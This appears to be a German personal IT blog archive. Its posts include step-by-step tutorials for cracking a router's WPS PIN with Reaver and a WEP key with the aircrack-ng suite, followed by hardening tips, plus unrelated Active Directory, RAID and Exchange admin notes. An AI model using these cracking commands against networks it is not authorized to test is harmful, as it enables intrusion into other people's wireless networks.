5ain7 ga11 . CH || i7-l3ak5. CH || g07r007.CH

Archive for October, 2013

WPS vs Reaver – per Knopfdruck….

by on Oct.27, 2013, under Knowledgebase, Networking, Router, Security

mit WLAN verbinden, einfach und schnell…so preisen es die Provider an. Genau so schnell kann man sich dies auch zunutzen machen. Ein WPA-Key zu bruteforcen ist grundsätzlich keine grosse Sache. Der Erfolg hängt natürlich von einer ordentlichen Wordlist ab. Je komplizierter der Key ist, desto länger dauert es, den Key zu knacken. Wäre da nicht das Feature WPS, dass die einfache, faule Anbindung von Devices anbietet. Der hart auserkorene WPA2 Key kann relativ schnell umgangen werden. Der WPS Key ist meist eine 6stellige Zahl..und darum leicht zu bruteforcen.und so geht es.

1. Backtrack starten, WLAN-Adapter in den Monitor-Mode versetzen.

<Airmon-ng Start wlan0>

 

2. mit wash checken, welche WLAN Router anfällig sind.

<wash -i mon0>

2wps

Der WLAP muss auf “WPS Locked NO” stehen.

3.  Mit Reaver den Key durchackern.

<reaver -i mon0 -b BSSID -vv -x 60>

Ich musste die Intervalle zwischen den Anfragen auf 60 Sekunden setzen, da das arme DLINK-Ding sonst schwer überfordert war und crashte.

4reav

Der Key war nach ca. 3h gefunden und der PSK wird gerade mitgegeben. Schnell und einfach per Knopfdruck mit den WLAN verbinden….:-)

 

Fazit zur Absicherung seines WLAN’s:

– KEIN WLAN betreiben:-) oder

– WPA Key bedacht wählen ( Sonderzeichen, keine ganzen im Duden findbare Wörter, möglichst viele Zeichen

– WPS Feature deaktivieren

– regelmässig die Firmware updaten

– MAC Access Liste ( eine Hürde mehr, aber meiner Meinung nach für die Füchse)

Leave a Comment more...

Backtrack vs. WEP Crack

by on Oct.25, 2013, under Knowledgebase, Security

Da ich meinen WEP Key meines uralten WLAPs vergessen/verloren hatte.-), wollte ich mal testen, wie einfach es ist, einem WEP Key zu cracken. Man muss kein Hacker-Meister sein dazu und ja..wer braucht schon noch WEP!!??

Die grösste Challenge dabei war, eine Backtrack 5R3-kompatible WLAN Karte zu finden.

Und so funzt es:

1. Das WLAN-Device in den Monitor Mode setzen:

<airmon-ng start wlanO>

Mon1

Das WLAN Device ist nun im Monitor Mode und muss mit MonO angesprochen werden.

 

2. neugierig Schauen, was alles für WLANs in der Nachbarschaft broadcasten:

<airodump-ng monO>

2airodump

3. Die Suche nach der BSSID und den Stations auf die gewünschte BSSID einschränken:

<airodump-ng -w Output -c channel –bssid BSSIDINPUT mon0>

3airodump

4. Neue Shellsession öffnen und anschliessend die verbundenen Stations zu einem disconnect und re-auth zwingen (fake auth)

<aireplay-ng -1 O -a BSSIDINPUT mon0>

4reauth

5. Neue Shellsession öffnen und anschliessend Verbindungspakete generieren (fake ARP Requests)

<aireplay-ng -3  -b BSSIDINPUT mon0>

5paketegener

6. Warten bis ein paar Pakete ausgetauscht wurden und anschliessend den Output analysieren.

<aircrack-ng Output-01.cap >

6Keyfound

PIC

et voila…fass es keinen Key findet, mehr Pakete abwarten.

 

fyi: Usage of the attacks => Aireplay

It currently implements multiple different attacks:

 

 

 

 

Leave a Comment more...

show last backup of active directory

by on Oct.23, 2013, under Knowledgebase, Windows 2008 Server, Windows Betriebssysteme, Windows Server 2012

Mit dem Befehl:

<repadmin /showbackup>

kann man sich einfach und schnell auf dem DC anzeigen lassen, wann das letzte Backup stattgefunden hat.

 

 

Leave a Comment more...

PERC 5 Controller und RAID 0 mit Disk Missing

by on Oct.23, 2013, under Dell, Knowledgebase, PERC Raid Controller

 

Ich hatte den Challenge bei einem Dell PowerEdge 2950 mit einem PERC5 Raid Controller mich um ein defektes RAID O zu kümmern. Das Striping war über 3 Platten verteilt. Beim Slot 3 der dritten Platte hiess es: Disk Missing.

Mit diversen Tests konnte ich jedoch herausfinden, dass die Disk i.O ist und der Controller ein Problem mit dem Slot haben muss.

Ich musste das RAIDO löschen und neu erstellen OHNE die Option “Initialisieren” zu aktivieren (wichtig: darf nicht aktiv sein!!). Das RAID 0 wurde neu gebildet und die Daten waren wieder da….heureka!!

 

Leave a Comment more...

Email Adresse in Exchange 2010 Organisation finden

by on Oct.21, 2013, under Exchange 2010, Exchange Server, Knowledgebase

Wenn ein Account mehrere Emailadressen hat, dann wird in der Standardauflistung nur die primäre angezeigt.
Mit folgendem Befehl kann nach einer Adresse gesucht werden:

<Get-Recipient -resultSize unlimited | select name -expand emailAddresses | where {$_.smtpAddress -match “.*test@.*“} | Format-Table name, smtpaddress>

Leave a Comment more...

Blogroll

A few highly recommended websites...